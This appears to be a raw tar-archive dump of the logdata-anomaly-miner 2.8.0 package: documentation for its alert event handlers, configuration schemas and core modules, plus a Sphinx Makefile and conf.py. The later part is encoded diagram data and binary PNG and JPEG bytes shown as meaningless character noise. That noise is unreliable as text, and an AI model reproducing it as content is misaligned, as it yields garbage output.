assigned weights. Strings that are not present in this dictionary have the weight 0.5 if not automatically weighted (default: None) * **auto_weights**: A boolean value that states if the weights should be automatically calculated through the formula 10 / (10 + number of value appearances) (default: False) * **auto_weights_history_length**: A integer value that specifies the number of values that are considered in the calculation of the weights (default: 1000) StreamPrinterEventHandler ~~~~~~~~~~~~~~~~~~~~~~~~~ The StreamPrinterEventHandler writes alerts to a stream. If no output_file_path is defined, it writes the output to **stdout** * **output_file_path**: This string value defines a file where the output should be written to. Default: stdout .. code-block:: yaml EventHandlers: # output to stdout: - id: 'stpe' type: 'StreamPrinterEventHandler' # output json to file: - id: 'stpefile' type: 'StreamPrinterEventHandler' json: true pretty: true output_file_path: '/tmp/aminer_out.log' SyslogWriterEventHandler ~~~~~~~~~~~~~~~~~~~~~~~~ The SyslogWriterEventHandler writes alerts to the local syslog instance. .. warning:: USE THIS AT YOUR OWN RISK: by creating aminer/syslog log data processing loops, you will flood your syslog and probably fill up your disks.0 * **instance_name**: This string defines the instance_name for the syslog. Default: **aminer** .. code-block:: yaml EventHandlers: - id: 'swe' type: 'SyslogWriterEventHandler' instance_name: 'logdata-anomaly-miner' KafkaEventHandler ~~~~~~~~~~~~~~~~~ The KafkaEventHandler writes it's output to a `Kafka Message-Queue `_ * **topic**: String property with the topic-name for the message queue * **cfgfile**: String property with the path to the kafka-config file. A comprehensive list of all config-parameters can be found at https://kafka-python.readthedocs.io/en/master/apidoc/KafkaProducer.html A typical kafka-config-file might look like this: .. code-block:: yaml [DEFAULT] bootstrap_servers = localhost:9092 security_protocol = PLAINTEXT .. note:: The header [DEFAULT] is important and must exist in the configuration file .. code-block:: yaml EventHandlers: # output to kafka using the topic 'aminer' - id: 'mqe' json: True topic: 'aminer' cfgfile: '/etc/aminer/kafka-client.conf' type: 'KafkaEventHandler' ZmqEventHandler ~~~~~~~~~~~~~~~ The ZmqEventHandler writes its output to a `Zero Message-Queue `_ * **topic**: String property with the topic-name for the message queue. If topic is not defined, then this handler will send messages without any topic. * **url**: String property with the url for the zmq-listener. If no url is defined, this handler will use 'ipc:///tmp/aminer'. A comprehensive list of all possible "endpoints" can be found at http://api.zeromq.org/master:zmq-bind .. code-block:: yaml EventHandlers: # output to zeromq using the topic 'aminer' - id: "zmqe" type: 'ZmqEventHandler' topic: 'aminer' url: 'tcp://*:5555' # tcp-port 5555 on all interfaces ------- Schemas ------- All analysis detectors, parsing models, and event handlers must be included in the validation and normalisation schemas for the YAML configurations. YamlConfig uses the ConfigValidator to normalize values and validate them against the validation schema. .. seealso:: :ref:`YamlConfig` :ref:`ConfigValidator` .. _BaseSchema: BaseSchema ~~~~~~~~~~ This module defines general configurations and Input configurations of the aminer. .. _Normalization: Normalization ~~~~~~~~~~~~~ Define all possible parameters and normalisation strategies such as default values for the defined group of modules. These groups are separated in the following modules: * **AnalysisNormalisationSchema** * **EventHandlerNormalisationSchema** * **ParserNormalisationSchema** .. _Validation: Validation ~~~~~~~~~~ Define all possible parameters and valid values for each module within the defined group of modules. These groups are separated in the following modules: * **AnalysisValidationSchema** * **EventHandlerValidationSchema** * **ParserValidationSchema** ------------ AMiner Files ------------ This section explains the functionality of important files of the aminer. .. _Aminer: Aminer ~~~~~~ This is the main module which starts the aminer program. It parses all arguments, initializes loggers, and handles graceful shutdowns. These loggers are by default divided into the following files: * **aminer.log**: Logs regarding the aminer such as the different startup stages of the process. The verbosity can be set with the Log.DebugLevel configuration. * **statistics.log**: Logs specific statistics such as the number of successfully processed log lines for each analysis component. * **aminerRemoteLog.log**: Logs all information about the changes done with the remote control using aminerremotecontrol.py. The process is started with root privileges to run all necessary tasks and it only uses the minimal set of imports. A subprocess starting the AnalysisChild is used for the main processing of log data. .. _AnalysisChild: AnalysisChild ~~~~~~~~~~~~~ This module handles sockets of the log files, registers all components, and runs the main analysis loop. It also handles the remote control sockets to change the running configuration using the AminerRemoteControlExecutionMethods. .. _AminerConfig: AminerConfig ~~~~~~~~~~~~ This module handles the loading and saving of configurations. When loading YAML configurations the configuration file is processed in YamlConfig. .. _YamlConfig: YamlConfig ~~~~~~~~~~ This module handles the loading of YAML configurations. It uses the ConfigValidator to normalize and validate the modules. When adding new components, they have to be added in this file. .. _ConfigValidator: ConfigValidator ~~~~~~~~~~~~~~~ This module normalizes, validates, and imports the modules for YAML configurations. logdata-anomaly-miner-2.8.0/docs/Makefile000066400000000000000000000011721500476301700202760ustar00rootroot00000000000000# Minimal makefile for Sphinx documentation # # You can set these variables from the command line, and also # from the environment for the first two. SPHINXOPTS ?= SPHINXBUILD ?= sphinx-build SOURCEDIR = . BUILDDIR = _build # Put it first so that "make" without argument is like "make help". help: @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) .PHONY: help Makefile # Catch-all target: route all unknown targets to Sphinx using the new # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS). %: Makefile @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) logdata-anomaly-miner-2.8.0/docs/conf.py000066400000000000000000000041501500476301700201340ustar00rootroot00000000000000# Configuration file for the Sphinx documentation builder. # # This file only contains a selection of the most common options. For a full # list see the documentation: # https://www.sphinx-doc.org/en/master/usage/configuration.html # -- Path setup -------------------------------------------------------------- # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # import os import sys sys.path.insert(0, os.path.abspath('.')) # -- Project information ----------------------------------------------------- project = 'logdata-anomaly-miner' copyright = '2023, Florian Skopik, Markus Wurzenberger, Max Landauer, Roman Fiedler, Wolfgang Hotwagner, Ernst Leierzopf, Georg Hoeld' author = 'Florian Skopik, Markus Wurzenberger, Max Landauer, Georg Hoeld, Roman Fiedler, Wolfgang Hotwagner, Ernst Leierzopf' release = '2.8.0' # -- General configuration --------------------------------------------------- # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = ['recommonmark', 'sphinx.ext.autodoc', 'sphinx.ext.napoleon'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This pattern also affects html_static_path and html_extra_path. exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = 'sphinx_rtd_theme' # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] logdata-anomaly-miner-2.8.0/docs/images/000077500000000000000000000000001500476301700201025ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/docs/images/aminer-config-color.drawio000066400000000000000000000031761500476301700251520ustar00rootroot000000000000007Zpbj5s4FMc/TR47AswlPOYy7VRqtSNlpe72zQEH3DoYGZOE/fRrB3MnQ6qNk1mpiTRjji/A739sH5+ZGVjtT58YTOOvNERkZhnhaQbWM8uyDGcufklLUVp8xyoNEcNhaTIbwwb/g5TRUNYchyjrNOSUEo7TrjGgSYIC3rFBxuix22xHSfeuKYzQwLAJIBlav+GQx6V17hiN/QXhKK7ubBqqZg+rxsqQxTCkx5YJPM/AilHKy9L+tEJEwqu4lP0+XqitH4yhhF/TgfoH5/PLD7wJ/jReo/13HtJvH0w1zAGSXL2xelpeVAjEg6eyGBQEJyFiYAaWxxhztElhICuOQnphi/meiCtTFLc0Fy3DL9vaAIOfEZPWP3IuhkHKnpWCm44os7KTqlHPhRhHp4tvbNYchQMiukecFaKJ6uDOFXrle5atro+Nkq4yxS0RraofVM4T1UM3fEVBIf4F3BaYxt3FMAE644z+RCtKKDv3BqHnb4ULguUOE9Kye76xNBeauHrOVVwdRxPWK5x4giPM0nL12OGTZH97Z6ydT0Ez3aEz2sYItdp4c2y3dsaey+0c+R1zUvf8kT1owlv28qOHd72jTPF2deG2dc99N5ij7W507m9NqAcrsLyn4ey/L1hHN9i5tQWlv3bB2gaE/lYT2Pnjwbradyt36zojYAEwDNvQA9a2Hw/WG4D9hBLEoOy4oskORzmDHNNkwFtw4G9BTaiMrTo8lQkSHCUyjBPckLAvJVUsIt2FqtjjMJS3GVWx0flGsgDX6a7PYLg+m85YdKZLlPmIt7tE0g7xQRQjWXyFLMNJVNWIG7Uq36lavV324/mjR0XgPFpF/xoVFwkkxW8dL+toj0RL99WxeoC3hXw+iBd8gUlIfot5WUzv4WJauiOJN2JfbedeAKyRSOK+J1/tCYXLse9i4S81gfWvS9Roi89M7We1e0S+faz2yOZ8X6xXHCiqbOOOoNNCJnAFC5SEqrgOCMwyHHTpVu9jzsvGKo1sjuTB7LX81nxROEj/TtJt0RtbRCsbQ0SE8Ifu8GNI1R1eKRY3rsXzDP+pu4ybXk+XjOYsQKqf1cr8Tg5Vn4mqoThkEeKDoQR1WLSapbJB9isPbRmdrLQolGM2TlST/Q9p1bFY4bbT9XJaVVtqxXIff1A1hyfVV5yicwb/fcZVjPLy5AzWfhVnqfUAyPUW72GEFv0baozGXGd6czPte0Zj1nB3+5ykOX+nirYUFHGkVq1sqzcFR7S6r1TD3OaGszzgORMT0KA78YPHshj8D9JG/bl4A8XqTbGodqCBYM7o3/i0KeYN4MsgY6MuKeMxjWgCyXNj7WFq2nyhNFV6/UCcFwoezDntqolOmP8luz9Zjrr8u1W1PqmhzxdFJceF0Kgv09sTbjqEEjDOkcoV+0wZh0w2HLrD1dHWBXHFZfOn+DIuaf6hATz/Cw== logdata-anomaly-miner-2.8.0/docs/images/aminer-config-color.png000066400000000000000000000737031500476301700244540ustar00rootroot00000000000000PNG  IHDR<tV:tEXtmxfile%3Cmxfile%20host%3D%22app.diagrams.net%22%20modified%3D%222021-02-18T11%3A43%3A02.619Z%22%20agent%3D%225.0%20(X11)%22%20etag%3D%22XN7FnLR9z8rV8TrF2oWa%22%20version%3D%2214.4.2%22%20type%3D%22device%22%3E%3Cdiagram%20id%3D%225UVBhFNdrDuveJu0V3Pm%22%20name%3D%22Page-1%22%3E7Zpbj5s4FMc%2FTR47AswlPOYy7VRqtSNlpe72zQEH3DoYGZOE%2FfRrB3MnQ6qNk1mpiTRjji%2FA739sH5%2BZGVjtT58YTOOvNERkZhnhaQbWM8uyDGcufklLUVp8xyoNEcNhaTIbwwb%2Fg5TRUNYchyjrNOSUEo7TrjGgSYIC3rFBxuix22xHSfeuKYzQwLAJIBlav%2BGQx6V17hiN%2FQXhKK7ubBqqZg%2BrxsqQxTCkx5YJPM%2FAilHKy9L%2BtEJEwqu4lP0%2BXqitH4yhhF%2FTgfoH5%2FPLD7wJ%2FjReo%2F13HtJvH0w1zAGSXL2xelpeVAjEg6eyGBQEJyFiYAaWxxhztElhICuOQnphi%2FmeiCtTFLc0Fy3DL9vaAIOfEZPWP3IuhkHKnpWCm44os7KTqlHPhRhHp4tvbNYchQMiukecFaKJ6uDOFXrle5atro%2BNkq4yxS0RraofVM4T1UM3fEVBIf4F3BaYxt3FMAE644z%2BRCtKKDv3BqHnb4ULguUOE9Kye76xNBeauHrOVVwdRxPWK5x4giPM0nL12OGTZH97Z6ydT0Ez3aEz2sYItdp4c2y3dsaey%2B0c%2BR1zUvf8kT1owlv28qOHd72jTPF2deG2dc99N5ij7W507m9NqAcrsLyn4ey%2FL1hHN9i5tQWlv3bB2gaE%2FlYT2Pnjwbradyt36zojYAEwDNvQA9a2Hw%2FWG4D9hBLEoOy4oskORzmDHNNkwFtw4G9BTaiMrTo8lQkSHCUyjBPckLAvJVUsIt2FqtjjMJS3GVWx0flGsgDX6a7PYLg%2Bm85YdKZLlPmIt7tE0g7xQRQjWXyFLMNJVNWIG7Uq36lavV324%2FmjR0XgPFpF%2FxoVFwkkxW8dL%2Btoj0RL99WxeoC3hXw%2BiBd8gUlIfot5WUzv4WJauiOJN2JfbedeAKyRSOK%2BJ1%2FtCYXLse9i4S81gfWvS9Roi89M7We1e0S%2Bfaz2yOZ8X6xXHCiqbOOOoNNCJnAFC5SEqrgOCMwyHHTpVu9jzsvGKo1sjuTB7LX81nxROEj%2FTtJt0RtbRCsbQ0SE8Ifu8GNI1R1eKRY3rsXzDP%2Bpu4ybXk%2BXjOYsQKqf1cr8Tg5Vn4mqoThkEeKDoQR1WLSapbJB9isPbRmdrLQolGM2TlST%2FQ9p1bFY4bbT9XJaVVtqxXIff1A1hyfVV5yicwb%2FfcZVjPLy5AzWfhVnqfUAyPUW72GEFv0baozGXGd6czPte0Zj1nB3%2B5ykOX%2BnirYUFHGkVq1sqzcFR7S6r1TD3OaGszzgORMT0KA78YPHshj8D9JG%2Fbl4A8XqTbGodqCBYM7o3%2Fi0KeYN4MsgY6MuKeMxjWgCyXNj7WFq2nyhNFV6%2FUCcFwoezDntqolOmP8luz9Zjrr8u1W1PqmhzxdFJceF0Kgv09sTbjqEEjDOkcoV%2B0wZh0w2HLrD1dHWBXHFZfOn%2BDIuaf6hATz%2FCw%3D%3D%3C%2Fdiagram%3E%3C%2Fmxfile%3E0^ IDATxgXg @AD Ĩ1&h4XbP,(6TlQc4GKQclػ ,6օݽ8?sogbvfVB!G&vB!% !BLB!< <B1yx!b0B!a!BC!B!&!BL<7oČ3о}{xzzVVVpuuEƍ1b ??_R \r_}Wkkkx{{˗%vA&A&ȑ#%bXJ{bly))SF0פ7+vaiiYd|2xmʕ+J9RM͛7+mիW]рI7oݽȇ<==QZ5-[Ve8N: mcbbJiWlZh!lot z«W=KWƍնc1>'22R~ǏWنǸ0 ԪUKi~'8vvvacc~˖-jonWL`ee%ķi8ay{xL ܽ{h֬\]]aii |ᇘ8q".^ֺsy>H >^3|"?s ֭u;d2ѣGE}tCy,]Tv3x2GL*zJ)7l Gdd$"##v ?^hx U lٲY&F%/wQe˖E:uPj";_deΝ;<`}? gϞiU~my[ZZ^zXbiq[ߏHL:Uhgoo/lH\Ӗ-[ѣG |rg.[,ׯ/ 4(.S[kٳȼ+UzZu*e~U}^ '''XZZ"88{ױo߾"GEE)ͧD[A֭Kʕ@˗/ v)|75kKh-)F5аaCBiz-mu~6m _-<\coo:u|Dɓn7C'sĤ|͉L&C5m6=TkZؕ*UL&٣C4xzz mj֬={ ++Khs]Ki[رC-y'v؁/^mܹ*זrJByyy8#;&L+~-}5=+''B[U"ܹsGœ9sԩSEBv4Wzm @ֺuT1D)|]ܹs';;M66lPe;C'sUŘ1cLOٸqy20(]dtжlٲE#BѴݻ'|+WgϞպ|3[}Vn.}94`xcUJĉJŃkOO4Ix$Uq6h@n֋ *SvmÇpuu+  x{aZ5O:scdNd$ZjL]">>^)n౰\.8OCǏ Ӝti̘1WIW/BuzݻTTt)]LxX#V(~Uq)~Uܾ@I,Up֚^~YځG۝K~I &;;:v=zr T|Z!رci :/mxm?;GUSU:{=.\PZnR<#F+Ν;z"%ѯZWҁ͛JsJ;𨺡B׮]ڵk1ydM4VRիJt-"K,Ӳe" = <_ŋ{WV~~iNU(~iӦe20(xmxm>W^i[(x!⭱HKKSZn xthXS?ܹ1pnߒ<𺭭Nmڴ-Z痗UVi}&OTQw!~Ez<&x(=~^^?SMq70DEE #F >\뼴QGS@${Vz&jHWL@ccN)])~ZILLTWׯbjxm/TZeǜ9sm6\p/Sx\z&m{5kVd:TQAkTѨQ#aEK!(Ad:t:/mDT?P׽{wu[){ Z{ ﱳ+2tMӧWIӧOė.]i=zS8mQlٲK#κ^3a=;w.2GL*tY/Sک-[VMI@?ca׮]JSB_~tooomM2Eh(]w}BO>DE7oT[C_~_|mȫi%x>C xqJAz…j&%%)@%ѯR <ΝSET"*(eHcǎM <f*~.ʁ'((H4e-X@|ѤI  w> |ذaΜ9Ox3nܸ8Cʕ+N@ݳ!{~NW>.U|p 2W~(==SNUQnC)y pQիWyf.wiVZ> gϞ{5._?2ٛDUEIWWW]:_SXXX`ĉEcǔ~zJ`~b {y0=33VYu"S|prvZ3G_ƚ5k)~mQ|Z/_OϞ=.[oi)faa 3/_ѣGp}TΏGL.Uaa jVVVضmy+E=н{w_-PdPZh=znݺ~+ ʕ+{j*duY_Cׯ;wʾ|tL'm肪 */23˕+-[W^#sgeeÇ+;`РAJTz~)zUC4 trrBUkw."&x7*v!11Q|cccUWrs.T퍄u6Lo鲾_k׮Up1J טvvv7oإBQ1g`ƌbB$سgT~AR!Ĩ;w.V{]  <ҥ :uꄔ! )) 9ugϞ]Y|9*W]v] !$۷oGJzjK1Y bI#"={D``eBY0b|bar >>>oMVbu2ŋ쌭[] !6mB*UpeK1Ν;>>> <ի'O] !%)))[.֮]+v)&)„ 0}t `ڴi  (ѿnN!cΜ98pe5 OS&3eΜ9 cdddN2!H -vD Ƽy.B̚5 aaab! xLW^|bA!DXXXb!: <&ȴi.vB$ɓ1sLlٲ B! ''VVVb!: <&?P "!''xLƍ#!!A2!HSNYfb!* <&Dbb"ԩ#vB$H͚5qu "44g B!dƌ2eeŋQ^}Z2!H'NEb! <&@vv6*T vBիWbQ0111رeB1>S۷O2J ((bA!;w.&N(v ЧO;wN2! ׯeŋ?֪N\xqׇG B!F@ZZ.`NNNZ}۰S.˲mׇG >k^rJa2dR3q ªU~*'\\\ѣ<\|X8VnGU"tѽ{wօG K.ň#ׯGll;Rw^lܸ0dXB×BÆ E; 6@,^ׯΝ;Eߡ(J۷#:: ,q>]vlٲeb׮]z +VR˅oLFjժUQFo 2A&}ENK;*)% 0tPr4ig}Sy&d2xd2n޼)J- } \}iѢ.\͛7兔r/Y&еkWܹsGXرc1tPl~!1{l;wĀl2o&կ_...Qvm\~Dͅ9"]x=]6m...&M}N< \j fBNPF ޽[DS+WT 50P}]6bbb4ٹs'j׮k׮!)) ~~~2e 7Dձ{nܽ{ΈGzz:ƍ???ov܉ϟcڵ_>޽AXnrՁӧ{|y8::HKKW_ ˯R nݺ\}bϰm6r!𤦦 [nEzz:F LSQ\ρbx)/X[[ 5()<^:.] ^ժUϑ+++!\M6}3ԩS}5mڴQZ'|h$$$^z[S <u2eʠo߾9s&N8Y^ZZ믱m6G‹;d27gmVZ%L{^ \t\gׯzffpp\oׯ#˗+5k;aڽ{`ii"xv܉f͚ ?~tGM6)ԭ[ .Dzz:r94Ǐf͚EСCHHHP 8 ۷ѽ{wkrPR%>}:t(urϣG₝;w"33(S _3gΠB z*={舃"==k׮N8Mٵk6}9rJdeeaݺupwwGjj*5x_ 4æM'vIJb֬YW1𨁁[W_ ֭_^zA.#++ SLѿB./xƌ#\uVԮ]åK  ǎCZΝ;cŊS\9#TT ~!?\^$;wÇ},QԘτ РA8p@RthРeQ%cJJpE.suQj(1۷ʕo&v)zuVXZZСCj0𨁁Ғٳgdž `|עE4d 77WRފ/_" /V9G Kď?(v%œ9saQR}4O>D2J6mȑ# o50PJ)G_SNRaҤIشi0PJ)G.]`bQ*ܹ]vJ)(SJ]Fjժ`Q R}zR`}xC)Txd2ٜy!d7QG \RJ8tPBJhoĉWJ"E:u d2>{QJ){#G:K0d`)t#;;ׯG͚51l0$&&jl qFl߾]iP?s?"|$D)LL9;)~ijJDž[lQ:~H]z*L+++=[n˗/K:`9r$*TS:G "::111sh.đ)57?/(?G(ZWZQسg6oެ!Eoٳ',--ѻwoL6 GAZZZ Tȑ#6mXYYW^رcG ==&;"ƍRJ;vu)>|jժ! XhpI\z |HMMիWq a… D@@<==^z!<<G1JWD`z Ԧ;R j늳UVCwbXx1FQFyA`kk KKKvvv-Z 00cƌŋ{>-d2?…ߙ(JދL ;R}'\34 WIZr2piEE̫,63j9 kf+{EDx(1OpiEEѷUIzi5rxC)T!$nhy*JڕCm0PJ)Ge!v* =Ѧ>Fx(ҡXQTlkNڽ"" 2%וo;RJx0 jK7 쪊J0\Zd2F7¢NwR黸n2Z`[ѷWi8SxG#2 y/r;RJ"^K>4[8JÕxk+"R0`sSpvq-J)E+XُRů {GzJQh]gx48`_>s|VbRꆩN \2n<~HL+MC-gѷaI:3lj.{EDT ؤpyU\{G:K;J)fޑ8<WU@҉ :?L&C^N*. z()I/D m\CX:m,քu7E&RJĵ#bMXw>caہ:?DA}ٸ ?63=k; KPZ_i(ؔgrLq3)o7bFT e<~Hrpmp(VrL*Fwz]UtwcR]\y/3{ED 6PZ ށ t*R9svyfC/n܍˫!qh<}=ygvL&CFV'D)TEGVK < d2> >}'R*}'V|PW_,?S?Hy&׸iD߁(S½f#a)x.|%y14";NF`HϋON⭧*חG VEy(Am} aQ <9!Hmg=aՈs2OZ_ΣRj<{oF,#f۬$w*vOi}x0|N,BkRJu7ı:+!L#2 O\Ôot7q <E)؇0XUŘxѷSi8zA& IDATG- J= Z]b^ZAAk0𨅁RJ>J=ku/uj+G`QR}4S x\/3 BJ˽;x5;z+_.o0𨁁ϣWsL(&P7޾xfz" >W Bm0ν8lR]cE$ڸ^Yjrs1$,A}G <ԔxSӰmWLz ׯ[ϲ623 |;zR;u' WEuF~^59x C<xJjJj <Gm_""q)(P7]NMC0קRgˠ2h$Bm܄2=?_/}(5xL&3@Dq~n<PP`Qw}.Zv~juQjHM%d2ѷ!G <kآ1ݽ.; `1J$dwOc۲I^i;k2HK-0PJ)GS<JECx(꣩J)c  zvG7)v juy{l4 mO-wCx(꣹udOJ?'5Fc~.`QR}4s/a9 6KGޫWem:?xC)T9݉uwV_6?xC)T9{lO0x0𨁁RJ>s'!ޢ8RJ>{؇0 ZӺxR-cf?5X Z G-ߌX`!8|)@Y/:g'&y3QJ)DȜȐT:~HƟľSԮP7OZO~^cu6C}){EDlL܃஁TCRJTnc03*OPy"EǜÔ5a{S࢏>FLTۼ7gpeA^95?0X EWڽ""C16gIa I)A1)" #16vCJi `B<2 AGJ G`RN*Wڽ""l03fbg!pT>mRj&>"lo"bF o:?qR28{{ Lޖ]Nl+^$3NǠߺ~[WQJ)5s.<8ϲ<~H]z 03.~[WsQJ)+/iJܼW8yc?~9č!0c?'oCN3/iwqQ{?zohXW_ޛާ`Uw%}5Sp)D0$-oib.,. ")b." "2&$az^9G|ϻY,pz,b Y%j;Tp:J}4JOX~ϣFsyB~naqW}ehaښ1ePJ)majsOa:)! ܬXO++0wz ; z>iZnٛ'qZ]Yv]31f[`aG+ J)b{4&&xNNg 'Ed|=^p kG6@J; yK#q ye%(*'6x&'$=(mO;rx]7v&JŮG jMPJ\0WŷW/\mcMtJOx!8#U(Bԝ X}{q}d?i;gM3/OOBQe*+Ffߔu'"MdpN ,G@zJԘ#bcHw0?R |PF9.D!A>JO8E"]]01w /!6r4(Rap: BL 8#yy!GOxTYۚ=ep<s/M j2x Cu2x5VWF"Y%j|r6 e]>x>9i.GxQ =0x1j쒢F{XOϝ餭Vecaښ1B;R]_7LLSNl=4XZWURJ)JO+Œ|uM? I]:37\EYuyK-} >v_"6f=*/l _/7 ;>WrJ)W#h۬󇜨 pmL +[4WsC$vg+U~aCb~^8e\玧RAt2^ӡܲAΕ:ȉ';|{,9ɠ45쳤WER}e 4_%QO2 <Ԫر t2F+U'!*Ks;血@);n֓<ȑ_w.=΁XqsL 7 Y%ju*tf+?i);/GeMB &l@g8 &Wޫ"!7Puy!\(RJ<IC Q]jp+M _ᔟ g!lA@RȬse:kzjqh?y/ɺҬB,D-x\B ="\D)T0J.xrnz{ Ly DP@'Fji{?ޭm;l}5ÌU34w7y^ 7N՟J~'R*>F<)_aӂMͬ{jGOFuϿLlL gf׍Wޫ"!#<7.D)x<|J} I}$_XOz,baNznu@^=@iqYaӐ2xhwJ)ǖp^1\SNA+>rl"&x >|1& GJZ<&[AN?G?~9k&RJh7n];Zc<Jܮ+xLٖj4;wJti*RJ8)..)L'ŎeڟʪWL{e?#7ڮ+xr0 T̟2G+I!$PJ)5>BfI} 6bKcY5af?n`D/\<3^[JͶ%Ze9d |<G+ J)b{y. I}]=×i:xFҭxXP$^L6Z?gޓ0xࡔR*F!!Gl,xe%5{XZdܼGj 1zr RJ<= A_<έ\5i`hC)T :>?|ꅴ˚ v5ԣ< =0x(r 4YlGy(xfi!ҮgDPH||v 39KsJ)uz =0x]Q`PYi vC`S)-*(-.Ûi(*,ƛE_j1xt W4D~g0Ommm?̆I'u6'3PW.x >c+v=3GO ͶaOS.3_kq74~2x,dNO;rPkx/&vp {a"(> v=f= >Qd<Y; W31 '=1S3ӆZ#zf=f5cߝXL_([=j ]n ^\>|FOd3 *W#/;yYF3u.(_cxWsZ?\?x޶?xfŪ8~ܦDot1<&`ߦF3,*TWU QόCa -?ΦrǏ}F&RJyZd衣BPJ)5 yCGRj< A)02x%GRJadK:/R =t_J)#/ 333 bDԿS 2'4?C9z˺sf5t [=7gnJ ++ i!556l@=j*(JTUUI2Kee%9+VW^ذaZt =`…RA!DX[[?c̙޽;䄨(6ٟZFTTG={6D_' 8RA!Dddd`РARn9s7nʕ+c"66PT(--<2TUUT*ܹs ۱rJaӧfϞ7"** s3x~ WWW "C6n'''ǐ,,Booơ7O1H+aݓz B!$'' z b<")) cB1 ͛7ٷoBX~=8 @0x kB~W Xh+BD F?AAARA!`RAObii#GH=!f &H=i#i jaڵF>}Я_?=666غu+x 77%%%RNy)))Ann.RRRHa֭Xd F~o߾?>GI=:yJ`<#::Xz5>bذa:t(޽{CP@J)5 {F1tP 6 իgDGG#??_2STUD,'IENDB`logdata-anomaly-miner-2.8.0/docs/images/analysis-pipeline.png000066400000000000000000010711321500476301700242430ustar00rootroot00000000000000        +G" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?S((((((((((((((((((((((((((((((((((((((((((4|O5~16Z]K,?,Q4.%VjWoDvW9v'x'Fq'8UYQpA #o?>P?Wފ+_G/Cw(EKƟP>WgE/ #o?H[O(nZ`T+3`R}[x^% ūs]$lee1㌊O<,,wj^nufl`3%eQԱ|u+?.f_uY02R\cMhy۴WƩjz6_-%#1,MCe]鲉-.B4E|+obYiYåfGr'ٲ>kI]YN:huGw @tQ_f/⧊-,UZC}"EȈC`a@|Q_"~~8~$Vjɤ"{{$Ȯ&s_]E~j^ ]|qC?i?@tW-O?㏏vL?+߅= oon/{Z?y#W5e7[J̋$RەԌ &(ojz$ [N"*62>- ' >&H~%|A;hTIE~j_5IO/|M*?HY?i7 n?ksԵ _ׇ[>Oy#I+bP73Ng4QEQEQEQEQEQ_|Sb,uq۔(08U`I&>ڢ/ޱWSMnZK 9%$5柶/5 hFen^*g(ck>'+o[wJ̣>L K'>|!lż:vKT3䜑k QTZzFyD:S8ԆA`_C]'H:J0'9p~vyo_'>X],/m^}~xgO4KHAh 3KWb1xjV<C/u"IC?:kiT G'/Ci+쏇?wc~֯x_Sׯ5;uu{dEUm Ԛj׊_1,52FeK6.!r  A+? |IJ LdZ$Zzur}ύ?i|HinZ?,R=I{k$Eѡ _?ATs|%x3How]h!'¨Cc*?^mtf fi:0r[7h/KR?4]ZaXu z"oBDSfГ3~57RTJSC2)acݱYK'5 yUinDkNAhBO_uK!'EjG_kW?OMW+jp>_-5F٬2Fۑ:cx}}g LJ?뭯7аXcZIeP"[izt~?Kr8>}}E~V[i"ۍQt븥bW+<kǽ~Q_#}rNԚLcܤt+_\V [] ߪ_타@>j.r _|ߵo s[脠g"ckg"ch@jn=>|lԾ;ZӴH5MNtay -T {1V_)Rf]>PIu3 = 1Ё:M?qI. @=)""5ii+$ q rT<ďZ(C[|)t2(G<{9vz4rIz1g;RVxbT 췇qȍNWu?gPùTm>%{ll[ E|3?5Ӣ?Q<'mui6}wm!GN ƬC7S`c췥xZx[N6`bQoB `9p9(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((~MBuKc1@mT7dcEaNΪWRVzE-'/x:O Ƨ]Ggm) Oa]?ן>,7Ehd90[ ~*NOzŽGwfj+ WI!J py;ܲM^voD~|-})wjfc`2Y $?O%xG={ J)l~4OzwȟI7gɆ2Lctԭ|]cck&׽iRH3;~Ж%I>_&u/f}vk*Ps54WG3wO% z ou_s_&J{_:j[y8k5]Lz_{ LMKxPIi=5_^'ss9%G'S]\H]bq+e&jcp˜&y ϚG֗T3clKS0_$*3袊(_|(m0kr#6щ6K txg`tX\J JI|1OX<]a ?~'O,.΀=)_}_?U5_௵򦾳K_&Wxx)h:(>SC)^`~'WSS} }7qjb]sšw>6u+KD@b( ( ^ }j۬Oȕ趠U<a/W_ x7V_=+ jpUrH琨ڪXn2Z|!t6:lɜg]~D˪|W5E.0=+L}=IbQLc݉k/ 2o@?Ķ2 NZX%4uڂF0%%ǩ}}c^[Nq?ľbذ:9R'{؟5 j pIЖCϭuO&<a[;G&; N3 `_Ś?>?,{%S%·۟u|aȋ|`2!PWƞ&׵XRG)A ;d# qVد?7*jn{P״iZfkU ##y · ~#\3uir;I?:+_6F0L2IS >xP|5|UVp?땷J_Lۖӎcc_4~տ\5m>Sjۋ@USjۋ@8xZ\z2 6vG\k*&>7!}&z_CP%C֟;7=I2aA6>V=}FE|w_ %z&#iu];%Sb~ڿHc mWơj$(3+յ8t]*P$[BTdU,q ۖ]SMf_)veQ} RoT}C#d㗅7y[yO@?}i3gi0,V78it{#袀>NZX%4uڂF0%%ǩ}Yo<[^j7} d?\׫~Ӷ|/,Tcfx3* -.0(bIxE7R2>¿,8感Uߋ|cVצK;7pH@oڢ3̺s0-27[=Pwwcw1m$%̆Qn1r}pp ý}*{A~_h ߨN 